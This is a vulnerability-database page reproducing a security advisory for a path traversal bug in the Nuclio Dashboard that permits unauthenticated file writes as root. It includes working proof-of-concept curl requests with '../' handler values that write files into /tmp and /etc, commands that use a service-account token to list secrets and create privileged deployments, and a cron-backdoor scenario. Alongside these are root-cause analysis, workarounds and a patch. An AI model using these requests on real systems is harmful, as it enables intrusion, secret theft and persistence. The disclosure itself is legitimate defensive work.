Skip to main content

Nuclio Dashboard CVE-2026-52832

MEDIUM
Path Traversal (CWE-22)
2026-07-16 https://github.com/nuclio/nuclio GHSA-wpcj-rmv4-86qg
4.9
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
4.9 MEDIUM
AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N
vuln.today AI
7.5 HIGH

Default NOP auth requires no credentials (PR:N); single HTTP request with no race condition (AC:L); write contained to Dashboard container with no data exfiltration in primary path (S:U, C:N, A:N).

3.1 AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
4.0 AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N

Primary rating from GitHub Advisory.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
High
User Interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
High
Availability
None

Lifecycle Timeline

2
Source Code Evidence Fetched
Jul 16, 2026 - 20:22 vuln.today
Analysis Generated
Jul 16, 2026 - 20:22 vuln.today

DescriptionGitHub Advisory

Summary

Nuclio Dashboard exposes POST /api/functions without authentication by default (NOP auth mode). The spec.handler field (e.g., mymodule:myfunction) is parsed by functionconfig.ParseHandler() which splits on : only - no path validation is applied to the module portion.

During function build, writeFunctionSourceCodeToTempFile() passes the module name directly to path.Join(tempDir, moduleFileName). Go's path.Join internally calls path.Clean, which resolves ../ sequences and allows the resolved path to escape tempDir. The function then calls os.WriteFile at the attacker-controlled path with attacker-controlled content (base64-decoded spec.build.functionSourceCode).

The write executes in the Dashboard container process running as uid=0 (root), allowing writes to any filesystem location the process can access: /tmp, /etc, /usr/local/bin, /etc/cron.d, and more.

  • CVSS 3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N - 7.5 (High)
  • CWE: CWE-22 (Improper Limitation of a Pathname to a Restricted Directory)
  • Affected versions: Nuclio <= 1.15.27 (latest at time of research, dynamically verified)

---

Details

Root Cause

The vulnerability spans three functions. The path from user input to disk write is:

1. ParseHandler - no path validation (pkg/functionconfig/handler.go:25-38):

go
// pkg/functionconfig/handler.go:25-38
func ParseHandler(handler string) (string, string, error) {
    moduleAndEntrypoint := strings.Split(handler, ":")
    switch len(moduleAndEntrypoint) {
    case 1:
        return "", moduleAndEntrypoint[0], nil
    case 2:
        // Returns moduleFileName verbatim - no path sanitization
        return moduleAndEntrypoint[0], moduleAndEntrypoint[1], nil
    default:
        return "", "", errors.Errorf("Invalid handler name %s", handler)
    }
}

Input "../../../../tmp/vul007_proof.txt:handler" returns moduleFileName = "../../../../tmp/vul007_proof.txt".

2. writeFunctionSourceCodeToTempFile - unsafe path construction (pkg/processor/build/builder.go:613-661):

go
// builder.go:624-657 (abridged)
tempDir, err := b.mkDirUnderTemp("source")
// tempDir = /tmp/nuclio-build-<random>/source

runtimeExtension, err := b.getRuntimeFileExtensionByName(b.options.FunctionConfig.Spec.Runtime)

moduleFileName, entrypoint, err := functionconfig.ParseHandler(b.options.FunctionConfig.Spec.Handler)
// moduleFileName = "../../../../tmp/vul007_proof.txt" - attacker-controlled

if !strings.Contains(moduleFileName, ".") {
    moduleFileName = fmt.Sprintf("%s.%s", moduleFileName, runtimeExtension)
}
// If moduleFileName already contains ".", no extension is appended
// "../../../../tmp/vul007_proof.txt" contains "." -> stays as-is

sourceFilePath := path.Join(tempDir, moduleFileName)
// path.Join("/tmp/nuclio-build-227825660/source", "../../../../tmp/vul007_proof.txt")
// = "/tmp/vul007_proof.txt"   <-- escaped tempDir

b.logger.DebugWith("Writing function source code to temporary file", "functionPath", sourceFilePath)
if err := os.WriteFile(sourceFilePath, decodedFunctionSourceCode, os.FileMode(0644)); err != nil {
    // Writes attacker-controlled bytes to attacker-controlled path

3. cleanupTempDir does not remove the traversal file (builder.go:1047-1061):

go
// builder.go:1053
err := os.RemoveAll(b.tempDir)
// Only removes /tmp/nuclio-build-<random>/ - traversal file outside this tree persists

Path Traversal Calculation

tempDir  = /tmp/nuclio-build-227825660/source   (depth from /: 3 components)
handler  = "../../../../tmp/vul007_proof.txt:handler"
module   = "../../../../tmp/vul007_proof.txt"

path.Join("/tmp/nuclio-build-227825660/source", "../../../../tmp/vul007_proof.txt")
= path.Clean("/tmp/nuclio-build-227825660/source/../../../../tmp/vul007_proof.txt")

Traversal:
  /tmp/nuclio-build-227825660/source  (start)
  ../  -> /tmp/nuclio-build-227825660
  ../  -> /tmp
  ../  -> /  (filesystem root)
  ../  -> /  (cannot go above root)
  tmp/vul007_proof.txt -> /tmp/vul007_proof.txt

The same technique with 4x ../ reaches any path under /tmp, /etc, /usr, etc.

Full Attack Chain

Unauthenticated HTTP client
  -> POST /api/functions (no auth, NOP mode)
       dashboard/resource/function.go:156 storeAndDeployFunction()
  -> platform.CreateFunction()
       platform/kube/platform.go:193
  -> abstract/platform.go:191 HandleDeployFunction()
  -> abstract/platform.go:119 CreateFunctionBuild()
  -> builder.Build()
       processor/build/builder.go:195
  -> builder.resolveFunctionPath()
       builder.go:664
  -> builder.writeFunctionSourceCodeToTempFile()   <-- file write here
       builder.go:613
  -> os.WriteFile(attacker_path, attacker_content, 0644)
       builder.go:657

---

PoC - Steps to Reproduce

Environment Setup

The following steps set up an isolated kind cluster and deploy Nuclio 1.15.27. All commands were executed on an Ubuntu host with Docker 29.1.2.

Step 1: Create isolated kind cluster with Docker socket mounted

The Dashboard container builder requires access to Docker daemon. Create a kind cluster configuration that mounts the host Docker socket into the cluster node:

bash
cat > /tmp/kind-vul007-config.yaml << 'EOF'
kind: Cluster
apiVersion: kind.x-k8s.io/v1alpha4
nodes:
- role: control-plane
  extraMounts:
  - hostPath: /var/run/docker.sock
    containerPath: /var/run/docker.sock
EOF

kind create cluster --name vul-007 --config /tmp/kind-vul007-config.yaml

Expected output:

Creating cluster "vul-007" ...
 ✓ Ensuring node image (kindest/node:v1.27.3)
 ✓ Preparing nodes
 ✓ Writing configuration
 ✓ Starting control-plane
 ✓ Installing CNI
 ✓ Installing StorageClass
Set kubectl context to "kind-vul-007"

Verify Docker socket is available inside the cluster node:

bash
docker exec vul-007-control-plane ls -la /var/run/docker.sock
# srw-rw---- 1 root 988 0 May 17 13:31 /var/run/docker.sock

Step 2: Deploy Nuclio via Helm

bash
# Create namespace
kubectl --context kind-vul-007 create namespace nuclio
# Load container images (if pre-pulled)
kind load docker-image quay.io/nuclio/dashboard:1.15.27-amd64 --name vul-007
kind load docker-image quay.io/nuclio/controller:1.15.27-amd64 --name vul-007
# Install with Helm (chart from source: hack/k8s/helm/nuclio)
helm install nuclio ./hack/k8s/helm/nuclio \
  --namespace nuclio \
  --kube-context kind-vul-007 \
  --set controller.image.pullPolicy=Never \
  --set dashboard.image.pullPolicy=Never \
  --set registry.pushPullUrl="localhost:5000" \
  --set dashboard.containerBuilderKind=docker

Step 3: Wait for Dashboard to be ready

bash
kubectl --context kind-vul-007 wait -n nuclio \
  --for=condition=ready pod -l nuclio.io/app=dashboard --timeout=90s
# Expected:
# pod/nuclio-dashboard-b4c5bb96f-txjkt condition met

Step 4: Expose Dashboard locally

bash
kubectl --context kind-vul-007 port-forward -n nuclio svc/nuclio-dashboard 8073:8070 &
sleep 3
# Verify Dashboard is accessible
curl -s -o /dev/null -w "HTTP %{http_code}\n" http://localhost:8073/api/functions
# HTTP 200

Step 5: Create default project (required by Dashboard API)

bash
curl -s -X POST http://localhost:8073/api/projects \
  -H "Content-Type: application/json" \
  -d '{"metadata":{"name":"default","namespace":"nuclio"},"spec":{"description":"default"}}'

---

Exploitation

Step 6: Send path traversal request

The handler field ../../../../tmp/vul007_proof.txt:handler instructs the build pipeline to write functionSourceCode content to /tmp/vul007_proof.txt inside the Dashboard container.

bash
curl -v -X POST http://localhost:8073/api/functions \
  -H "Content-Type: application/json" \
  -H "x-nuclio-project-name: default" \
  -d '{
    "metadata": {"name": "vul007-poc", "namespace": "nuclio"},
    "spec": {
      "runtime": "python:3.11",
      "handler": "../../../../tmp/vul007_proof.txt:handler",
      "build": {
        "functionSourceCode": "UFJPVkVELVBBVEgtVFJBVkVSU0FMLVZVTDAwNw=="
      },
      "minReplicas": 0,
      "maxReplicas": 1
    }
  }'

functionSourceCode base64 decoded: PROVED-PATH-TRAVERSAL-VUL007

Expected response:

HTTP/1.1 202 Accepted

Step 7: Observe Dashboard build logs

bash
kubectl --context kind-vul-007 logs -n nuclio deploy/nuclio-dashboard --tail=20 \
  | grep -E "temporary dir|Writing function source"

Actual log output (captured during verification, timestamp 2026-05-17 14:55:02 CST):

26.05.17 14:55:02.225 (D) dashboard.server.api/functions  Created temporary dir
  {"dir": "/tmp/nuclio-build-227825660/source"}

26.05.17 14:55:02.225 (D) dashboard.server.api/functions  Writing function source code to temporary file
  {"functionPath": "/tmp/vul007_proof.txt"}

The log confirms functionPath resolved to /tmp/vul007_proof.txt, which is outside the tempDir /tmp/nuclio-build-227825660/source. Path traversal is confirmed.

Step 8: Verify file written to traversal path

bash
kubectl --context kind-vul-007 exec -n nuclio deploy/nuclio-dashboard \
  -- cat /tmp/vul007_proof.txt

Output:

PROVED-PATH-TRAVERSAL-VUL007
bash
kubectl --context kind-vul-007 exec -n nuclio deploy/nuclio-dashboard \
  -- ls -la /tmp/vul007_proof.txt

Output:

-rw-r--r--    1 root     root            28 May 17 14:55 /tmp/vul007_proof.txt

Step 9: Write to /etc/ - broader impact demonstration

bash
curl -s -X POST http://localhost:8073/api/functions \
  -H "Content-Type: application/json" \
  -H "x-nuclio-project-name: default" \
  -d '{
    "metadata": {"name": "vul007-poc2", "namespace": "nuclio"},
    "spec": {
      "runtime": "python:3.11",
      "handler": "../../../../etc/vul007-marker.txt:handler",
      "build": {
        "functionSourceCode": "VlVMMDA3LVBFUlNJU1RFTlQtTUFSS0VSLXJvb3Q="
      }
    }
  }'

Log evidence:

26.05.17 14:55:50.666 (D) dashboard.server.api/functions  Writing function source code to temporary file
  {"functionPath": "/etc/vul007-marker.txt"}
bash
kubectl --context kind-vul-007 exec -n nuclio deploy/nuclio-dashboard \
  -- cat /etc/vul007-marker.txt
# VUL007-PERSISTENT-MARKER-root

---

Cleanup

bash
kubectl --context kind-vul-007 delete nucliofunction vul007-poc vul007-poc2 -n nuclio 2>/dev/null || true
kind delete cluster --name vul-007

---

Impact

Direct Impact

An unauthenticated attacker with network access to the Nuclio Dashboard port can write arbitrary content to any path accessible by the Dashboard process (running as root) inside the Dashboard container.

Demonstrated write targets:

  • /tmp/ - confirmed (primary PoC)
  • /etc/ - confirmed (secondary PoC)

Potential high-impact write targets:

  • /etc/cron.d/ - write a cron job entry; if a cron daemon runs in the container, this

achieves scheduled arbitrary command execution inside the container

  • /usr/local/bin/<name> - overwrite a binary called by dashboard processes
  • Any file path accessible by root within the container filesystem

Privilege Escalation

The Dashboard container runs as uid=0 (root). Its mounted Kubernetes ServiceAccount (nuclio-dashboard) holds the following RBAC permissions in the nuclio namespace:

Resources         Verbs
secrets           [*]
deployments.apps  [*]
pods              [*]
configmaps        [*]
services          [*]
cronjobs.batch    [*]

Verification: Using the SA token directly against the Kubernetes API:

bash
# List secrets - HTTP 200
curl -k -H "Authorization: Bearer $SA_TOKEN" \
  "$K8S_API/api/v1/namespaces/nuclio/secrets"
# => returns helm release secret, nuclio SA secret
# Create privileged Deployment - HTTP 201
curl -k -X POST -H "Authorization: Bearer $SA_TOKEN" \
  -H "Content-Type: application/json" \
  "$K8S_API/apis/apps/v1/namespaces/nuclio/deployments" \
  -d '{"spec":{"template":{"spec":{"containers":[{"name":"t","image":"busybox","securityContext":{"privileged":true}}]}}}}'
# HTTP_CODE:201

An attacker who compromises the Dashboard container (via this file write vulnerability) gains access to this SA token and can create privileged workloads in the nuclio namespace, potentially escalating to cluster-level access depending on cluster configuration.

Scope

The file write is bounded to the Dashboard container filesystem. Host-level writes require additional preconditions (hostPath volumes, privileged container mode, or DinD configuration) not present in a standard Nuclio Kubernetes deployment.

---

Severity

CVSS 3.1 Score: 7.5 (High)

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
MetricValueRationale
Attack VectorNetworkDashboard API reachable over network
Attack ComplexityLowSingle HTTP request, no race condition
Privileges RequiredNoneDefault NOP auth mode requires no credentials
User InteractionNoneFully automated
ScopeUnchangedWrite confined to Dashboard container
ConfidentialityNoneNo data read in primary attack path
IntegrityHighArbitrary file write as root in container
AvailabilityNoneNo service disruption caused by write

---

Affected Versions

  • Nuclio <= 1.15.27 (latest release at time of research)
  • Dynamically verified against quay.io/nuclio/dashboard:1.15.27-amd64 on 2026-05-17

The vulnerable code path (writeFunctionSourceCodeToTempFile in pkg/processor/build/builder.go) has been present since the functionSourceCode inline code feature was introduced.

---

Patched Versions

https://github.com/nuclio/nuclio/releases/tag/1.16.5

---

Workarounds

Option 1: Enable authentication on the Dashboard

Set NUCLIO_AUTH_KIND to a non-NOP value (e.g., iguazio) to require credentials. This prevents unauthenticated access to the API. Consult Nuclio documentation for supported auth providers.

yaml
# In Dashboard deployment env
- name: NUCLIO_AUTH_KIND
  value: "iguazio"

Option 2: Network-level access control

Restrict network access to the Dashboard port (default 8070) to trusted networks only. Do not expose the Dashboard directly to the internet.

Option 3: Drop root privileges in the Dashboard container

Run the Dashboard process as a non-root user to reduce the impact of container-level arbitrary file writes.

---

Remediation

Add a path boundary check in writeFunctionSourceCodeToTempFile after constructing sourceFilePath:

go
// pkg/processor/build/builder.go - fix for writeFunctionSourceCodeToTempFile
sourceFilePath := path.Join(tempDir, moduleFileName)

// Verify resolved path is within tempDir
absPath, err := filepath.Abs(sourceFilePath)
if err != nil {
    return "", errors.Wrap(err, "Failed to resolve absolute path")
}
absTempDir, err := filepath.Abs(tempDir)
if err != nil {
    return "", errors.Wrap(err, "Failed to resolve absolute tempDir")
}
if !strings.HasPrefix(absPath, absTempDir+string(os.PathSeparator)) {
    return "", errors.Errorf(
        "handler module path escapes build directory: %s", moduleFileName)
}

b.logger.DebugWith("Writing function source code to temporary file", "functionPath", absPath)
if err := os.WriteFile(absPath, decodedFunctionSourceCode, os.FileMode(0644)); err != nil {

Alternatively, reject any handler module name containing path separator characters before the build pipeline is invoked (at API request validation time).

---

Resources

  • Vulnerable file: pkg/processor/build/builder.go - function writeFunctionSourceCodeToTempFile, line 654
  • Parser: pkg/functionconfig/handler.go - function ParseHandler, line 25
  • Go path.Join behavior: https://pkg.go.dev/path#Join
  • CWE-22: https://cwe.mitre.org/data/definitions/22.html
  • OWASP Path Traversal: https://owasp.org/www-community/attacks/Path_Traversal

AnalysisAI

Unauthenticated path traversal in Nuclio Dashboard's function build API allows arbitrary file write as root inside the Dashboard container. The spec.handler field accepts unsanitized module names containing ../ sequences, which Go's path.Join/path.Clean resolves to escape the build temp directory; the resulting path is passed to os.WriteFile running as uid=0. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Unauthenticated POST to Dashboard API
Delivery
Embed ../traversal in spec.handler module name
Exploit
path.Join resolves path outside build tempDir
Execution
os.WriteFile writes attacker bytes as root
Persist
Persist backdoor via /etc/cron.d or binary overwrite
Impact
Execute code inside Dashboard container

Vulnerability AssessmentAI

Exploitation Exploitation requires that the Nuclio Dashboard be deployed with its default NOP authentication mode active, meaning the `NUCLIO_AUTH_KIND` environment variable is unset or set to `nop` - this is the out-of-the-box configuration. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment Two conflicting CVSS scores exist for this CVE. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario A publicly available proof-of-concept exists. An unauthenticated attacker on the network sends a single HTTP POST to `/api/functions` with a crafted `spec.handler` value such as `../../../../etc/cron.d/backdoor:handler` and a base64-encoded cron job payload in `spec.build.functionSourceCode`; the Dashboard process writes the content to `/etc/cron.d/backdoor` as root inside the container. …
Remediation The vendor-released patch is Nuclio 1.16.5, available at https://github.com/nuclio/nuclio/releases/tag/1.16.5; upgrade to this version or later to fully remediate. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

CVE-2025-1974 CRITICAL POC
9.8 Mar 25

A critical vulnerability in Kubernetes ingress-nginx controller allows unauthenticated attackers with pod network access

CVE-2026-45321 CRITICAL POC
9.6 May 12

Credential-harvesting malware compromised 84 versions of 42 TanStack npm packages on 2026-05-11 via chained GitHub Actio

CVE-2025-1098 HIGH POC
8.8 Mar 25

Kubernetes ingress-nginx contains a configuration injection vulnerability via the mirror-target and mirror-host Ingress

CVE-2025-24514 HIGH POC
8.8 Mar 25

A security issue was discovered in ingress-nginx https://github.com/kubernetes/ingress-nginx where the `auth-url` Ingres

CVE-2025-1097 HIGH POC
8.8 Mar 25

A security issue was discovered in ingress-nginx https://github.com/kubernetes/ingress-nginx where the `auth-tls-match-c

CVE-2020-8554 MEDIUM POC
6.3 Jan 21

Kubernetes API server in all versions allow an attacker who is able to create a ClusterIP service and set the spec.exter

CVE-2025-55190 CRITICAL POC
9.9 Sep 04

Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. Rated critical severity (CVSS 9.9), this vulne

CVE-2018-18843 CRITICAL POC
10.0 Dec 04

The Kubernetes integration in GitLab Enterprise Edition 11.x before 11.2.8, 11.3.x before 11.3.9, and 11.4.x before 11.4

CVE-2026-22039 CRITICAL POC
9.9 Jan 27

Kyverno Kubernetes policy engine prior to 1.x has a privilege escalation vulnerability (CVSS 9.9) allowing policy bypass

CVE-2024-42480 CRITICAL POC
9.9 Aug 12

Kamaji is the Hosted Control Plane Manager for Kubernetes. Rated critical severity (CVSS 9.9), this vulnerability is rem

CVE-2023-28110 CRITICAL POC
9.9 Mar 16

Jumpserver is a popular open source bastion host, and Koko is a Jumpserver component that is the Go version of coco, ref

CVE-2026-25996 CRITICAL POC
9.8 Feb 12

String filter bypass in Inspektor Gadget Kubernetes eBPF tooling before fix. Insufficient string escaping enables filter

Share

CVE-2026-52832 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy